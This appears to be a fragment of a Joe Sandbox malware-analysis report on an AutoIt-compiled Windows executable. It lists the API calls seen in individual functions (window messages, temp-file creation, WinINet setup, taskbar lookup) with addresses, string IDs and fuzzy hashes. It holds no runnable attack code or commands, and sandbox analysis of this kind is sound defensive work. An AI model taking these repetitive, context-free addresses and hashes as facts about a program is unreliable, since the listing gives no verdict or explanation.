                          Uniqueness Score: -1.00%

                          APIs
                          • __snwprintf.LIBCMT ref: 00B56BDD
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __snwprintf_memmove
                          • String ID: , $$AUTOITCALLVARIABLE%d
                          • API String ID: 3506404897-2584243854
                          • Opcode ID: 10b7330444fd0a39a15652fbd27a66dead5fd14632b29cc47a0aa9e9af377617
                          • Instruction ID: 208c1725aee603c79c4e2c716383998752194eeb652e9df9b32662b4fdd43dba
                          • Opcode Fuzzy Hash: 10b7330444fd0a39a15652fbd27a66dead5fd14632b29cc47a0aa9e9af377617
                          • Instruction Fuzzy Hash: 0E214D31600218ABCF14EFA4C882EEE7BF9EF55B00F5044D5F946A7191DB70EA45CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00B69269
                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B69274
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend
                          • String ID: Combobox
                          • API String ID: 3850602802-2096851135
                          • Opcode ID: 98e5402d067da5ec7bb82301eafd0842bb67a58d9b93b021ffbd3052b34d8a51
                          • Instruction ID: 7620bbf94217168942c84e0c66247a11b987986affb34017057f841529542ee4
                          • Opcode Fuzzy Hash: 98e5402d067da5ec7bb82301eafd0842bb67a58d9b93b021ffbd3052b34d8a51
                          • Instruction Fuzzy Hash: 2B116071200209BFEF219E54DC91EEB37EEEB893A4F104165F9189B290D679DC518BA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B1C657
                            • Part of subcall function 00B1C619: GetStockObject.GDI32(00000011), ref: 00B1C66B
                            • Part of subcall function 00B1C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B1C675
                          • GetWindowRect.USER32(00000000,?), ref: 00B69775
                          • GetSysColor.USER32(00000012), ref: 00B6978F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                          • String ID: static
                          • API String ID: 1983116058-2160076837
                          • Opcode ID: a15a8dd2aafe6b08eda46bab9218f3a973a130cc2ccd40d5ce55ddcafb0c2536
                          • Instruction ID: 9e9b5c69c94371aa7a8f816fec1a2dd727e05d3aba8b1c23d360d74c784e91fb
                          • Opcode Fuzzy Hash: a15a8dd2aafe6b08eda46bab9218f3a973a130cc2ccd40d5ce55ddcafb0c2536
                          • Instruction Fuzzy Hash: 6A112672520209AFDB04DFB8CC46EFA7BE8EB08314F004A69F956E3251E779E851DB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowTextLengthW.USER32(00000000), ref: 00B694A6
                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00B694B5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: LengthMessageSendTextWindow
                          • String ID: edit
                          • API String ID: 2978978980-2167791130
                          • Opcode ID: 3b5745d8c17a28cab9eb916eb68c9ea0a754a9fa8bc979609104636a2d034af1
                          • Instruction ID: db9143d755224c0c3c6595b44c25798a070f39616d1973102dd865a4bc1e4a60
                          • Opcode Fuzzy Hash: 3b5745d8c17a28cab9eb916eb68c9ea0a754a9fa8bc979609104636a2d034af1
                          • Instruction Fuzzy Hash: 8A113D71100108AFEF209E64DC85EEB3BADEF05374F504765F965972E0CA79DC529B60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • _memset.LIBCMT ref: 00B45CF3
                          • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00B45D12
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: InfoItemMenu_memset
                          • String ID: 0
                          • API String ID: 2223754486-4108050209
                          • Opcode ID: 9234db479411176dab0dd8ddf3d1c20f6089abc598f1b811dc54419b93c6b5d5
                          • Instruction ID: 50fcd0273c862df2e11c100b1e8582ddcc4ea4d4af038f3b857d2b5a24ca9054
                          • Opcode Fuzzy Hash: 9234db479411176dab0dd8ddf3d1c20f6089abc598f1b811dc54419b93c6b5d5
                          • Instruction Fuzzy Hash: DA117C72D01A18BBDB30DA5CD888F9977E9EF06354F1800A1F945EB192D770AE04E792
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00B5544C
                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00B55475
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Internet$OpenOption
                          • String ID: <local>
                          • API String ID: 942729171-4266983199
                          • Opcode ID: 882bd6fcd832d4b5b00d4b9641f309def4bf84525dd1f9634cb31852ef9ea2d7
                          • Instruction ID: 96298931bb3f1d92d98f8e1d9a25ceb1857e9fda77d0ad4ce71fda8dd3d11798
                          • Opcode Fuzzy Hash: 882bd6fcd832d4b5b00d4b9641f309def4bf84525dd1f9634cb31852ef9ea2d7
                          • Instruction Fuzzy Hash: 7C11C170141A21BADB248F5188A5FFABBE8EF12753F1081AAF90542240E3706988C6B0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: htonsinet_addr
                          • String ID: 255.255.255.255
                          • API String ID: 3832099526-2422070025
                          • Opcode ID: 0ae5024b8d8f9a0bbfad797ea643b2c05909beece75583591e799c9b294d340c
                          • Instruction ID: b43be6ba6a95fbfb8fd44db9c09bd7b4b4c7f841f92ddf3dd17bd38cf998d482
                          • Opcode Fuzzy Hash: 0ae5024b8d8f9a0bbfad797ea643b2c05909beece75583591e799c9b294d340c
                          • Instruction Fuzzy Hash: F801D675200205ABCB10AF64C886FADB3F4EF04721F2086ABF915AB2D1DA71E804C756
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00B3C5E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: 833463c6f3ed079cea508054fcf105001546dcf722763361fffb1a322b63cf9a
                          • Instruction ID: 2ba5db3037340fc938552e7bdee3dcb817bf64002749c6b5aa4ee3e8fc97e54b
                          • Opcode Fuzzy Hash: 833463c6f3ed079cea508054fcf105001546dcf722763361fffb1a322b63cf9a
                          • Instruction Fuzzy Hash: 6101B171601518ABCB19EBA4CC928FE7BE9EF52310B240A99F433E72D1DF70A9089750
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: __fread_nolock_memmove
                          • String ID: EA06
                          • API String ID: 1988441806-3962188686
                          • Opcode ID: 035e59e0147efc994d914e7af7f0986d4862643670e63b87d459c509116e3ad8
                          • Instruction ID: 510e14747da7096d59d68a06576f6114dda9c9e18419d3fec5a6d16466a6dea4
                          • Opcode Fuzzy Hash: 035e59e0147efc994d914e7af7f0986d4862643670e63b87d459c509116e3ad8
                          • Instruction Fuzzy Hash: CE01F572900228AEDB68D7A8C856EFE7BF89F15711F00419AE197D2281E5B4A708CB60
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00B3C4E1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: fc281c202dcc1a51c6285a25e15c5fa19f4dc32c53cc4256506c1f9b1d71828a
                          • Instruction ID: 6f8bd8ab4c20a83f7f697adf88ace546c6f45787be157a45db759a271ccdaab8
                          • Opcode Fuzzy Hash: fc281c202dcc1a51c6285a25e15c5fa19f4dc32c53cc4256506c1f9b1d71828a
                          • Instruction Fuzzy Hash: 10018F716415086BDB15EBA4C9A2AFF7BE89B05300F240595A503F32D1EF549E0897A1
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00B3C562
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend_memmove
                          • String ID: ComboBox$ListBox
                          • API String ID: 1456604079-1403004172
                          • Opcode ID: f9cf92e722553422588007d8a5741e816e02ae1afa8a81a82b766f411c4365a1
                          • Instruction ID: 1baf3fa520bb4013bc1d68ef947ce551ea8ca7337ad501e60e533614e640f976
                          • Opcode Fuzzy Hash: f9cf92e722553422588007d8a5741e816e02ae1afa8a81a82b766f411c4365a1
                          • Instruction Fuzzy Hash: D801AD71A415086BDB15EBA4C953EFF7BEC9B11701F240195B403F31D1EB54AE0997B1
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ClassName_wcscmp
                          • String ID: #32770
                          • API String ID: 2292705959-463685578
                          • Opcode ID: 696574c1a29a37f96a87911445300cf8791d4b8b5034fc1801d7a7fffd6ac041
                          • Instruction ID: 962d4fd52fe2087e4835e7575535894baec9829234b08c2a76c7d25542f76890
                          • Opcode Fuzzy Hash: 696574c1a29a37f96a87911445300cf8791d4b8b5034fc1801d7a7fffd6ac041
                          • Instruction Fuzzy Hash: 94E0D83360422967D720EBA5EC4AEDBFBECEB51B64F000066F914D3191EAB0974587D0
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00B3B36B
                            • Part of subcall function 00B22011: _doexit.LIBCMT ref: 00B2201B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Message_doexit
                          • String ID: AutoIt$Error allocating memory.
                          • API String ID: 1993061046-4017498283
                          • Opcode ID: 09035f713dcc1fa15457e082d9a97bd44b01826e8f576149c6f7dec9b0096c7d
                          • Instruction ID: 5972162c6846a9aee6264c0826661a99f782fa4091a74d026ca033ac0c6deaea
                          • Opcode Fuzzy Hash: 09035f713dcc1fa15457e082d9a97bd44b01826e8f576149c6f7dec9b0096c7d
                          • Instruction Fuzzy Hash: 9DD0123138432833D21532957C0BFD97BC88F05B51F1000A6BF4CA61E28AD6A49092E9
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • GetTempPathW.KERNEL32(00000104,?), ref: 00B4D01E
                          • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00B4D035
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Temp$FileNamePath
                          • String ID: aut
                          • API String ID: 3285503233-3010740371
                          • Opcode ID: 99a976f81e62828ec6a8ac0dd9df9013a73239564447bca9ebf0f9518fa27123
                          • Instruction ID: c3c320fe38c1c48a42d2cf1532c0a13a6bfa2c3c04a49e0db44ef17c422f40e3
                          • Opcode Fuzzy Hash: 99a976f81e62828ec6a8ac0dd9df9013a73239564447bca9ebf0f9518fa27123
                          • Instruction Fuzzy Hash: 8BD05EB154030EBBDB10AFA0ED0EFA9B7ACA700704F1041917615D20F1D7F0E645CBA0
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B6849F
                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00B684B2
                            • Part of subcall function 00B48355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B483CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: 2112e0d72762299eaa31852d96640731d72c2f59593f9626c300b25e3c73e3b3
                          • Instruction ID: 4447a6157720c842ee4564a6979a53bec0e4e30a6dc8f237d66be5c7e8069ddb
                          • Opcode Fuzzy Hash: 2112e0d72762299eaa31852d96640731d72c2f59593f9626c300b25e3c73e3b3
                          • Instruction Fuzzy Hash: 77D0C976388318B7E664A7709C4BFD66B94AB14B11F05096A724AAA1E0CDE0A900C764
                          Uniqueness
                          • Uniqueness Score: -1.00%
                          APIs
                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00B684DF
                          • PostMessageW.USER32(00000000), ref: 00B684E6
                            • Part of subcall function 00B48355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B483CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FindMessagePostSleepWindow
                          • String ID: Shell_TrayWnd
                          • API String ID: 529655941-2988720461
                          • Opcode ID: c227228546790065829adacc9dfc2c91bb7e1d8e6d1fed3be23bfe9c5f8b2304
                          • Instruction ID: d975af9c751f76151d52267597b994081f3c274ed49185d27029440cdb078834
                          • Opcode Fuzzy Hash: c227228546790065829adacc9dfc2c91bb7e1d8e6d1fed3be23bfe9c5f8b2304
                          • Instruction Fuzzy Hash: 4FD0C972384318BBE665A7709C4BFD66794AB18B11F05096A724AAA1E0CDE0B900C764
                          Uniqueness
                          • Uniqueness Score: -1.00%